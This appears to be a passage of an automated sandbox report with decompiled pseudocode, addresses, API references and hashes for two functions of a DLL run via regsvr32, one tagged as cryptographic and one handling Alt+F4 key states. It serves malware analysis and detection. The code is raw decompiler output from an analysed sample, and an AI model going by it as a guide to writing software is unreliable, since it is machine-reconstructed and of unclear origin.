                                                                                                            Function 1000DB7F Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E1000DB7F(signed int* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t240;
				intOrPtr* _t241;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t260;
				signed int _t263;
				signed int _t267;
				void* _t272;
				void* _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				void* _t304;
				intOrPtr* _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t319;
				signed int* _t320;
				intOrPtr _t342;
				signed int _t346;
				signed int _t359;
				signed int _t390;
				signed int _t392;
				signed int _t396;
				void* _t402;
				signed int _t405;
				signed int _t408;
				signed int _t410;
				signed int _t414;
				void* _t416;
				signed int _t418;
				signed int _t422;
				void* _t423;
				signed int _t427;
				signed int _t430;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				signed int _t439;

				E10011BF0(0x1003af23, _t432);
				_t435 = _t434 - 0x54;
				_t240 =  *0x1004c470; // 0xf3933a06
				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t320 = __ecx;
				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
				asm("movsd");
				 *((char*)(_t432 - 0x3d)) = 0;
				_t241 =  *((intOrPtr*)(_t432 + 8));
				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x10040644, _t432 - 0x3c, _t402, _t416, _t319);
				if(_t418 >= 0) {
					_t419 = __ecx + 0x14;
					__eflags =  *_t419;
					 *(_t432 - 0x2c) = 0;
					if( *_t419 != 0) {
						 *((char*)(__ecx + 0x1c)) = 1;
						goto L13;
					} else {
						 *(_t432 - 0x28) = 0;
						_t311 =  *((intOrPtr*)(_t432 + 8));
						 *(_t432 - 4) = 1;
						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x10040624, _t432 - 0x28);
						 *(_t432 - 0x38) = _t312;
						__eflags = _t312;
						_t313 =  *(_t432 - 0x28);
						if(_t312 >= 0) {
							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
							_t419 = _t314;
							__eflags = _t314;
							_t315 =  *(_t432 - 0x28);
							 *(_t432 - 4) = 0;
							if(_t314 >= 0) {
								__eflags = _t315;
								 *((char*)(__ecx + 0x1c)) = 0;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L13:
								 *(_t432 - 0x34) = 0;
								 *(_t432 - 4) = 2;
								 *(_t432 - 0x34) = E1001F77E(_t320[3] * 0x34);
								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
								__eflags =  *(_t432 - 0x34);
								if( *(_t432 - 0x34) != 0) {
									 *(_t432 - 4) = 4;
									_t320[4] = E1001F77E(_t320[3]);
									_t405 = 0;
									__eflags = _t320[4];
									 *(_t432 - 4) = 0;
									if(__eflags != 0) {
										 *(_t432 - 0x30) =  *(_t432 - 0x34);
										 *(_t432 - 0x38) = 0;
										while(1) {
											__eflags = _t405 - _t320[3];
											if(_t405 >= _t320[3]) {
												break;
											}
											 *((char*)(_t405 + _t320[4])) = 0;
											_t410 = _t405 + _t405 * 2 << 4;
											_t272 = _t320[5] + _t410;
											__eflags =  *(_t272 + 0x10) - _t320[9];
											if( *(_t272 + 0x10) <= _t320[9]) {
												L41:
												_t342 =  *((intOrPtr*)(_t272 + 0x14));
												__eflags = _t342 - 0xd;
												if(_t342 != 0xd) {
													__eflags = _t342 - 0x81;
													if(_t342 == 0x81) {
														_t156 = _t272 + 0x10;
														 *_t156 =  *(_t272 + 0x10) + 1;
														__eflags =  *_t156;
													}
													_t274 = _t320[5] + _t410;
													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
													if( *((short*)(_t274 + 0x14)) == 0x82) {
														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
													}
													_t276 = _t320[5] + _t410;
													__eflags = _t276;
													 *(_t432 - 0x28) = _t276;
													_t278 = E10009FD2( *(_t276 + 0x14) & 0x0000ffff);
													_push(0);
													goto L55;
												} else {
													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
													 *(_t432 - 4) = 8;
													 *(_t432 - 0x44) = E1001F77E(0x14);
													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
													__eflags =  *(_t432 - 0x44);
													if( *(_t432 - 0x44) != 0) {
														goto L49;
													} else {
														_t414 =  *(_t432 - 0x38);
														__eflags = _t414;
														if(__eflags > 0) {
															_t427 =  *(_t432 - 0x34) + 0x14;
															__eflags = _t427;
															do {
																_push( *_t427);
																L1001F7A9(_t320, _t414, _t427, __eflags);
																_t427 = _t427 + 0x34;
																_t414 = _t414 - 1;
																__eflags = _t414;
															} while (__eflags != 0);
														}
														goto L47;
													}
												}
											} else {
												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
												if( *((short*)(_t272 + 0x14)) == 0xd) {
													goto L41;
												} else {
													_t359 = _t320[8];
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														__eflags = _t359 - 1;
														if(_t359 != 1) {
															__eflags =  *((char*)(_t432 - 0x3d));
															if(__eflags == 0) {
																_t419 = 0;
																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
																 *(_t432 - 0x50) = 0;
																 *(_t432 - 0x4c) = 0;
																E1000DAA7(_t320, _t410, 0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
																__eflags =  *(_t432 - 0x50);
																if( *(_t432 - 0x50) == 0) {
																	__eflags =  *(_t432 - 0x4c);
																	if( *(_t432 - 0x4c) != 0) {
																		_t419 = 0x1004079c;
																		goto L32;
																	}
																} else {
																	_t419 = 0x100407ac;
																	L32:
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																}
																 *((char*)(_t432 - 0x3d)) = 1;
															}
															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
															 *(_t432 - 4) = 6;
															 *(_t432 - 0x44) = E1001F77E(0x14);
															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
															__eflags =  *(_t432 - 0x44);
															if( *(_t432 - 0x44) != 0) {
																L49:
																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
																 *(_t432 - 0x28) = _t320[5] + _t410;
																_t278 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
																_push( *(_t432 - 0x44));
																L55:
																_t169 =  *(_t432 - 0x2c) - 1; // -1
																_t419 = _t278 + _t169 &  !(_t278 - 1);
																_t281 =  *(_t432 - 0x28);
																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
																_t390 = _t346 + 0x00000007 & 0xfffffffc;
																_push(_t390);
																_push(_t346);
																_push(_t419);
																_push(0);
																 *(_t432 - 0x2c) = _t390;
																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
																 *(_t432 - 0x28) = _t390;
																_push(0);
																_push(0);
																_push( *((intOrPtr*)(_t281 + 0x10)));
																__eflags = 0;
																_push(0);
																_push( *((intOrPtr*)(_t281 + 8)));
																_push( *(_t432 - 0x30));
																E10009E21();
																_t435 = _t435 + 0x30;
																goto L56;
															} else {
																_t414 =  *(_t432 - 0x38);
																__eflags = _t414;
																if(__eflags > 0) {
																	_t430 =  *(_t432 - 0x34) + 0x14;
																	__eflags = _t430;
																	do {
																		_push( *_t430);
																		L1001F7A9(_t320, _t414, _t430, __eflags);
																		_t430 = _t430 + 0x34;
																		_t414 = _t414 - 1;
																		__eflags = _t414;
																	} while (__eflags != 0);
																}
																L47:
																_push( *(_t432 - 0x34));
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_push(_t320[4]);
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_t320[4] = _t320[4] & 0x00000000;
																goto L15;
															}
														} else {
															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
															 *(_t432 - 0x28) = _t320[5] + _t410;
															_t304 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
															_t90 =  *(_t432 - 0x2c) - 1; // -1
															_t419 = _t304 + _t90 &  !(_t304 - 1);
															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
															 *(_t432 - 0x28) = _t392;
															 *(_t432 - 0x2c) = _t392 + 4;
															E10009F01( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
															_t435 = _t435 + 0x38;
															goto L56;
														}
													} else {
														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
														_t396 = _t67 & 0xfffffffc;
														 *(_t432 - 0x28) = _t396;
														 *(_t432 - 0x2c) = _t396 + 4;
														_t419 = 0;
														E10009F01( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
														_t435 = _t435 + 0x34;
														L56:
														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
														 *(_t320[5] + _t410 + 4) = _t419;
														_t405 =  *(_t432 - 0x38);
														continue;
													}
												}
											}
											goto L85;
										}
										__eflags =  *_t320;
										if( *_t320 != 0) {
											L67:
											_t320[2] = _t320[2] & 0x00000000;
											 *(_t432 - 4) = 0xa;
											_t320[2] = E1001F77E( *(_t432 - 0x2c));
											_t249 = _t320[2];
											_t405 = 0;
											__eflags = _t249;
											 *(_t432 - 4) = 0;
											if(_t249 != 0) {
												E10011C50(_t249, 0,  *(_t432 - 0x2c));
												_t418 = E10009DD7( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
												__eflags = _t418;
												if(__eflags < 0) {
													_push(_t320[4]);
													L1001F7A9(_t320, 0, _t418, __eflags);
													_t320[4] = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t418, __eflags);
												goto L81;
											} else {
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t422 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t422;
													do {
														_push( *_t422);
														L1001F7A9(_t320, _t405, _t422, __eflags);
														_t405 = _t405 + 1;
														_t422 = _t422 + 0x34;
														__eflags = _t405 - _t320[3];
													} while (__eflags < 0);
													_t405 = 0;
													__eflags = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_t320[4] = _t405;
												goto L74;
											}
										} else {
											_push(1);
											_t263 = E10009D73(_t320);
											__eflags = _t263;
											 *(_t432 - 0x38) = _t263;
											if(_t263 >= 0) {
												 *((char*)( *_t320 + 4)) = 1;
												goto L67;
											} else {
												_t423 = 0;
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t408 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t408;
													do {
														_push( *_t408);
														L1001F7A9(_t320, _t408, _t423, __eflags);
														_t423 = _t423 + 1;
														_t408 = _t408 + 0x34;
														__eflags = _t423 - _t320[3];
													} while (__eflags < 0);
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_t267 =  *(_t432 - 0x3c);
												_t320[4] = _t320[4] & 0x00000000;
												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
												__eflags = _t267;
												goto L63;
											}
										}
									} else {
										_push( *(_t432 - 0x34));
										L1001F7A9(_t320, 0, _t419, __eflags);
										L74:
										_t260 =  *(_t432 - 0x3c);
										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
										__eflags = _t260 - _t405;
										goto L75;
									}
								} else {
									L15:
									_t260 =  *(_t432 - 0x3c);
									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
									__eflags = _t260;
									L75:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t260 + 8))(_t260);
									}
									_t254 = 0x8007000e;
								}
							} else {
								__eflags = _t315;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L81:
								_t253 =  *(_t432 - 0x3c);
								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
								__eflags = _t253 - _t405;
								goto L82;
							}
						} else {
							__eflags = _t313;
							 *(_t432 - 4) = 0;
							if(_t313 != 0) {
								 *((intOrPtr*)( *_t313 + 8))(_t313);
							}
							_t267 =  *(_t432 - 0x3c);
							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
							__eflags = _t267;
							L63:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t267 + 8))(_t267);
							}
							_t254 =  *(_t432 - 0x38);
						}
					}
				} else {
					_t253 =  *(_t432 - 0x3c);
					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
					_t439 = _t253;
					L82:
					if(_t439 != 0) {
						 *((intOrPtr*)( *_t253 + 8))(_t253);
					}
					_t254 = _t418;
				}
				L85:
				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
				return E100117AE(_t254,  *((intOrPtr*)(_t432 - 0x14)));
			}
















































                                                                                                            0x1000db84
                                                                                                            0x1000db89
                                                                                                            0x1000db8c
                                                                                                            0x1000db91
                                                                                                            0x1000dba0
                                                                                                            0x1000dba1
                                                                                                            0x1000dba2
                                                                                                            0x1000dba3
                                                                                                            0x1000dba5
                                                                                                            0x1000dba8
                                                                                                            0x1000dbab
                                                                                                            0x1000dbae
                                                                                                            0x1000dbaf
                                                                                                            0x1000dbb3
                                                                                                            0x1000dbb8
                                                                                                            0x1000dbc8
                                                                                                            0x1000dbcc
                                                                                                            0x1000dbde
                                                                                                            0x1000dbe1
                                                                                                            0x1000dbe3
                                                                                                            0x1000dbe6
                                                                                                            0x1000dc65
                                                                                                            0x00000000
                                                                                                            0x1000dbe8
                                                                                                            0x1000dbe8
                                                                                                            0x1000dbeb
                                                                                                            0x1000dbfa
                                                                                                            0x1000dbfe
                                                                                                            0x1000dc00
                                                                                                            0x1000dc03
                                                                                                            0x1000dc05
                                                                                                            0x1000dc08
                                                                                                            0x1000dc32
                                                                                                            0x1000dc35
                                                                                                            0x1000dc37
                                                                                                            0x1000dc39
                                                                                                            0x1000dc3c
                                                                                                            0x1000dc40
                                                                                                            0x1000dc55
                                                                                                            0x1000dc57
                                                                                                            0x1000dc5b
                                                                                                            0x1000dc60
                                                                                                            0x1000dc60
                                                                                                            0x1000dc69
                                                                                                            0x1000dc70
                                                                                                            0x1000dc73
                                                                                                            0x1000dc7d
                                                                                                            0x1000dc93
                                                                                                            0x1000dc97
                                                                                                            0x1000dc9b
                                                                                                            0x1000dcae
                                                                                                            0x1000dcb8
                                                                                                            0x1000dcce
                                                                                                            0x1000dcd0
                                                                                                            0x1000dcd3
                                                                                                            0x1000dcd6
                                                                                                            0x1000dce8
                                                                                                            0x1000dceb
                                                                                                            0x1000dcee
                                                                                                            0x1000dcee
                                                                                                            0x1000dcf1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000dcfa
                                                                                                            0x1000dd04
                                                                                                            0x1000dd07
                                                                                                            0x1000dd0c
                                                                                                            0x1000dd0f
                                                                                                            0x1000deaa
                                                                                                            0x1000deaa
                                                                                                            0x1000deae
                                                                                                            0x1000deb2
                                                                                                            0x1000df65
                                                                                                            0x1000df6a
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df6c
                                                                                                            0x1000df72
                                                                                                            0x1000df74
                                                                                                            0x1000df7a
                                                                                                            0x1000df83
                                                                                                            0x1000df83
                                                                                                            0x1000df89
                                                                                                            0x1000df89
                                                                                                            0x1000df8b
                                                                                                            0x1000df93
                                                                                                            0x1000df98
                                                                                                            0x00000000
                                                                                                            0x1000deb8
                                                                                                            0x1000deb8
                                                                                                            0x1000debe
                                                                                                            0x1000dec8
                                                                                                            0x1000dede
                                                                                                            0x1000dee2
                                                                                                            0x1000dee6
                                                                                                            0x00000000
                                                                                                            0x1000dee8
                                                                                                            0x1000dee8
                                                                                                            0x1000deeb
                                                                                                            0x1000deed
                                                                                                            0x1000def2
                                                                                                            0x1000def2
                                                                                                            0x1000def5
                                                                                                            0x1000def5
                                                                                                            0x1000def7
                                                                                                            0x1000defc
                                                                                                            0x1000deff
                                                                                                            0x1000deff
                                                                                                            0x1000df00
                                                                                                            0x1000def5
                                                                                                            0x00000000
                                                                                                            0x1000deed
                                                                                                            0x1000dee6
                                                                                                            0x1000dd15
                                                                                                            0x1000dd15
                                                                                                            0x1000dd1a
                                                                                                            0x00000000
                                                                                                            0x1000dd20
                                                                                                            0x1000dd20
                                                                                                            0x1000dd23
                                                                                                            0x1000dd26
                                                                                                            0x1000dd77
                                                                                                            0x1000dd7a
                                                                                                            0x1000de07
                                                                                                            0x1000de0b
                                                                                                            0x1000de1a
                                                                                                            0x1000de1e
                                                                                                            0x1000de25
                                                                                                            0x1000de2c
                                                                                                            0x1000de2f
                                                                                                            0x1000de32
                                                                                                            0x1000de37
                                                                                                            0x1000de3a
                                                                                                            0x1000de43
                                                                                                            0x1000de46
                                                                                                            0x1000de48
                                                                                                            0x00000000
                                                                                                            0x1000de48
                                                                                                            0x1000de3c
                                                                                                            0x1000de3c
                                                                                                            0x1000de4d
                                                                                                            0x1000de50
                                                                                                            0x1000de51
                                                                                                            0x1000de52
                                                                                                            0x1000de53
                                                                                                            0x1000de53
                                                                                                            0x1000de54
                                                                                                            0x1000de54
                                                                                                            0x1000de58
                                                                                                            0x1000de5e
                                                                                                            0x1000de68
                                                                                                            0x1000de7e
                                                                                                            0x1000de82
                                                                                                            0x1000de86
                                                                                                            0x1000df23
                                                                                                            0x1000df26
                                                                                                            0x1000df2c
                                                                                                            0x1000df2d
                                                                                                            0x1000df2e
                                                                                                            0x1000df2f
                                                                                                            0x1000df39
                                                                                                            0x1000df3c
                                                                                                            0x1000df46
                                                                                                            0x1000df53
                                                                                                            0x1000df5b
                                                                                                            0x1000df60
                                                                                                            0x1000df9a
                                                                                                            0x1000df9d
                                                                                                            0x1000dfa4
                                                                                                            0x1000dfa6
                                                                                                            0x1000dfb0
                                                                                                            0x1000dfb6
                                                                                                            0x1000dfb9
                                                                                                            0x1000dfba
                                                                                                            0x1000dfc0
                                                                                                            0x1000dfc1
                                                                                                            0x1000dfc3
                                                                                                            0x1000dfc6
                                                                                                            0x1000dfca
                                                                                                            0x1000dfcd
                                                                                                            0x1000dfd3
                                                                                                            0x1000dfd4
                                                                                                            0x1000dfd7
                                                                                                            0x1000dfdd
                                                                                                            0x1000dfde
                                                                                                            0x1000dfe1
                                                                                                            0x1000dfe4
                                                                                                            0x1000dfe9
                                                                                                            0x00000000
                                                                                                            0x1000de88
                                                                                                            0x1000de88
                                                                                                            0x1000de8b
                                                                                                            0x1000de8d
                                                                                                            0x1000de92
                                                                                                            0x1000de92
                                                                                                            0x1000de95
                                                                                                            0x1000de95
                                                                                                            0x1000de97
                                                                                                            0x1000de9c
                                                                                                            0x1000de9f
                                                                                                            0x1000de9f
                                                                                                            0x1000dea0
                                                                                                            0x1000dea3
                                                                                                            0x1000df03
                                                                                                            0x1000df03
                                                                                                            0x1000df06
                                                                                                            0x1000df0b
                                                                                                            0x1000df0e
                                                                                                            0x1000df13
                                                                                                            0x00000000
                                                                                                            0x1000df18
                                                                                                            0x1000dd80
                                                                                                            0x1000dd80
                                                                                                            0x1000dd8a
                                                                                                            0x1000dd95
                                                                                                            0x1000dd9e
                                                                                                            0x1000dda6
                                                                                                            0x1000ddae
                                                                                                            0x1000ddb5
                                                                                                            0x1000ddc7
                                                                                                            0x1000ddca
                                                                                                            0x1000ddd0
                                                                                                            0x1000ddfa
                                                                                                            0x1000ddff
                                                                                                            0x00000000
                                                                                                            0x1000ddff
                                                                                                            0x1000dd28
                                                                                                            0x1000dd31
                                                                                                            0x1000dd36
                                                                                                            0x1000dd39
                                                                                                            0x1000dd3f
                                                                                                            0x1000dd49
                                                                                                            0x1000dd6a
                                                                                                            0x1000dd6f
                                                                                                            0x1000dfec
                                                                                                            0x1000dfec
                                                                                                            0x1000dff3
                                                                                                            0x1000dff6
                                                                                                            0x1000dffa
                                                                                                            0x00000000
                                                                                                            0x1000dffa
                                                                                                            0x1000dd26
                                                                                                            0x1000dd1a
                                                                                                            0x00000000
                                                                                                            0x1000dd0f
                                                                                                            0x1000e002
                                                                                                            0x1000e005
                                                                                                            0x1000e06a
                                                                                                            0x1000e06d
                                                                                                            0x1000e071
                                                                                                            0x1000e07b
                                                                                                            0x1000e091
                                                                                                            0x1000e094
                                                                                                            0x1000e096
                                                                                                            0x1000e098
                                                                                                            0x1000e09b
                                                                                                            0x1000e0ed
                                                                                                            0x1000e105
                                                                                                            0x1000e10a
                                                                                                            0x1000e10c
                                                                                                            0x1000e10e
                                                                                                            0x1000e111
                                                                                                            0x1000e117
                                                                                                            0x1000e117
                                                                                                            0x1000e11a
                                                                                                            0x1000e11d
                                                                                                            0x00000000
                                                                                                            0x1000e09d
                                                                                                            0x1000e09d
                                                                                                            0x1000e0a0
                                                                                                            0x1000e0a5
                                                                                                            0x1000e0a5
                                                                                                            0x1000e0a8
                                                                                                            0x1000e0a8
                                                                                                            0x1000e0aa
                                                                                                            0x1000e0af
                                                                                                            0x1000e0b0
                                                                                                            0x1000e0b3
                                                                                                            0x1000e0b6
                                                                                                            0x1000e0b9
                                                                                                            0x1000e0b9
                                                                                                            0x1000e0b9
                                                                                                            0x1000e0bb
                                                                                                            0x1000e0be
                                                                                                            0x1000e0c3
                                                                                                            0x1000e0c6
                                                                                                            0x1000e0cc
                                                                                                            0x00000000
                                                                                                            0x1000e0cc
                                                                                                            0x1000e007
                                                                                                            0x1000e007
                                                                                                            0x1000e00b
                                                                                                            0x1000e010
                                                                                                            0x1000e012
                                                                                                            0x1000e015
                                                                                                            0x1000e066
                                                                                                            0x00000000
                                                                                                            0x1000e017
                                                                                                            0x1000e017
                                                                                                            0x1000e019
                                                                                                            0x1000e01c
                                                                                                            0x1000e021
                                                                                                            0x1000e021
                                                                                                            0x1000e024
                                                                                                            0x1000e024
                                                                                                            0x1000e026
                                                                                                            0x1000e02b
                                                                                                            0x1000e02c
                                                                                                            0x1000e02f
                                                                                                            0x1000e032
                                                                                                            0x1000e024
                                                                                                            0x1000e035
                                                                                                            0x1000e038
                                                                                                            0x1000e03d
                                                                                                            0x1000e040
                                                                                                            0x1000e045
                                                                                                            0x1000e048
                                                                                                            0x1000e04c
                                                                                                            0x1000e052
                                                                                                            0x00000000
                                                                                                            0x1000e052
                                                                                                            0x1000e015
                                                                                                            0x1000dcd8
                                                                                                            0x1000dcd8
                                                                                                            0x1000dcdb
                                                                                                            0x1000e0cf
                                                                                                            0x1000e0cf
                                                                                                            0x1000e0d2
                                                                                                            0x1000e0d7
                                                                                                            0x00000000
                                                                                                            0x1000e0d7
                                                                                                            0x1000dc9d
                                                                                                            0x1000dc9d
                                                                                                            0x1000dc9d
                                                                                                            0x1000dca0
                                                                                                            0x1000dca4
                                                                                                            0x1000e0d9
                                                                                                            0x1000e0d9
                                                                                                            0x1000e0de
                                                                                                            0x1000e0de
                                                                                                            0x1000e0e1
                                                                                                            0x1000e0e1
                                                                                                            0x1000dc42
                                                                                                            0x1000dc42
                                                                                                            0x1000dc44
                                                                                                            0x1000dc4d
                                                                                                            0x1000dc4d
                                                                                                            0x1000e123
                                                                                                            0x1000e123
                                                                                                            0x1000e126
                                                                                                            0x1000e12a
                                                                                                            0x00000000
                                                                                                            0x1000e12a
                                                                                                            0x1000dc0a
                                                                                                            0x1000dc0a
                                                                                                            0x1000dc0c
                                                                                                            0x1000dc10
                                                                                                            0x1000dc15
                                                                                                            0x1000dc15
                                                                                                            0x1000dc18
                                                                                                            0x1000dc1b
                                                                                                            0x1000dc1f
                                                                                                            0x1000e054
                                                                                                            0x1000e054
                                                                                                            0x1000e059
                                                                                                            0x1000e059
                                                                                                            0x1000e05c
                                                                                                            0x1000e05c
                                                                                                            0x1000dc08
                                                                                                            0x1000dbce
                                                                                                            0x1000dbce
                                                                                                            0x1000dbd1
                                                                                                            0x1000dbd5
                                                                                                            0x1000e12c
                                                                                                            0x1000e12c
                                                                                                            0x1000e131
                                                                                                            0x1000e131
                                                                                                            0x1000e134
                                                                                                            0x1000e134
                                                                                                            0x1000e136
                                                                                                            0x1000e139
                                                                                                            0x1000e14c

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 3519838083-4088798008
                                                                                                            • Opcode ID: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                                                            • Instruction ID: 1dfa92099b7bbb73699ef0bf43d1d48827835450d39971bd9aeca5f6306c0f37
                                                                                                            • Opcode Fuzzy Hash: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                                                            • Instruction Fuzzy Hash: 8412D071D04245EFEB09DFA4D884AAEBBB1EF44350F25819AF805AF296C771ED40CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003437E Relevance: 3.0, APIs: 2, Instructions: 40keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1003437E(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t12;
				signed char _t15;
				void* _t20;

				_t20 = __ecx;
				_t15 = E100202AB(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000001) == 0)) {
					L6:
					return E10031CF0(_t20, _a4, _a8);
				}
				_t12 = E10023123(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}







                                                                                                            0x10034384
                                                                                                            0x1003438b
                                                                                                            0x1003438f
                                                                                                            0x100343ce
                                                                                                            0x00000000
                                                                                                            0x100343d6
                                                                                                            0x100343c5
                                                                                                            0x100343cc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100343df

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetKeyState.USER32(00000073), ref: 100343A8
                                                                                                            • GetKeyState.USER32(00000012), ref: 100343B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$LongWindow
